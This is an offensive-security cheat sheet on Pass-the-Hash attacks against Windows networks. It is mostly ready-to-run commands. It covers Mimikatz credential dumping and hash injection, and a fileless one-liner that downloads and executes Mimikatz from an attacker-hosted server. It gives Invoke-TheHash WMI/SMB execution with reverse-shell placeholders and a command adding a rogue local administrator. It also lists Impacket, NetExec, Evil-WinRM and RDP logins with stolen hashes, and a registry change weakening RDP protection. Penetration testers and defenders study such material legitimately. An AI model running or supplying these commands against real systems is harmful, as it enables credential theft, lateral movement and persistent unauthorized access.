
Pass the Hash (PtH)

Pass the Hash (PtH) is a technique where an attacker uses hashed credentials (password hashes) to authenticate and gain access to a computer or network, bypassing password authentication.

Hashes can be obtained from sources including, but not limited to, the following:

  • Local SAM database
  • NTDS.dit database
  • Memory (lsass.exe)
  • Registry hives (SAM and SYSTEM files)
  • Cached domain credentials
  • LSA secrets
  • Network sniffing (NTLM hashes)

From Windows

Mimikatz

Dump Hashes

sekurlsa::logonpasswords
lsadump::sam

If Mimikatz is not available, use one of the other hash-dumping techniques.

PtH

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH

This spawns a cmd.exe whose network authentication uses the injected hash (locally the process still belongs to the logged-on user), so from it we can reach resources as that user, for example with dir \\dc01\rezy.

Example

sekurlsa::pth /user:rezy /domain:rezydev.xyz /ntlm:<HASH>
mimikatz.exe privilege::debug "sekurlsa::pth /user:rezy /ntlm:d41d8cd98f00b204e9800998ecf8427e /domain:rezydev.xyz /run:cmd.exe" exit

Fileless

IEX (New-Object Net.WebClient).DownloadString('http://<SELF-HOSTED-SERVER-IP>/mimikatz.ps1'); Invoke-Mimikatz -Command 'sekurlsa::pth /user:rezy /domain:rezydev.xyz /ntlm:<HASH> /run:powershell.exe'

PowerShell Invoke-TheHash

WMI

Import-Module .\Invoke-TheHash.psd1

# Reverse Shell:
Invoke-WMIExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash <HASH> -Command "PowerShell #3 (Base64) Payload Here"
# Use PowerShell #3 (Base64) from https://www.revshells.com/

SMB

Import-Module .\Invoke-TheHash.psd1

# Generic form: the command either adds a new user or starts a reverse shell
Invoke-SMBExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash <HASH> -Command "OUR COMMAND HERE, EITHER ADD A NEW USER OR GET A REVERSE SHELL" -Verbose

# The following command adds a new local administrator 'jethalal'
Invoke-SMBExec -Target 10.10.10.10 -Domain rezydev.xyz -Username rezy -Hash d41d8cd98f00b204e9800998ecf8427e -Command "net user jethalal Coolpass123 /add && net localgroup administrators jethalal /add" -Verbose

From Linux

Impacket

python3 /opt/impacket/build/scripts-3.12/psexec.py -hashes :<NT-HASH> rezydev.xyz/rezy@10.10.10.10

Warning: the -hashes argument takes the form LMHASH:NTHASH.
  • HASH: places the value in the LM position; this form is only meaningful when an NT hash is also given after the colon.
  • :HASH places the value in the NT position with no LM hash before the colon, which is the form to use when only the NT hash is known.

NetExec

nxc smb 10.10.10.10 -u <username> -H <HASH> -d rezydev.xyz
Info: use --local-auth in NetExec/CrackMapExec to authenticate to each host in a subnet with the local administrator password hash.

Tip: use -x COMMAND in NetExec/CrackMapExec to execute commands.

Evil-WinRM

evil-winrm -i 10.10.10.10 -u Administrator -H <HASH-HERE>

RDP

xfreerdp /v:10.10.10.10 /u:Administrator /pth:<HASH-HERE>
Warning: Pass-the-Hash over RDP only works when Restricted Admin Mode is enabled, which it is not by default. Enable it by setting the REG_DWORD value DisableRestrictedAdmin to 0 under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.

It can be enabled with the following command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f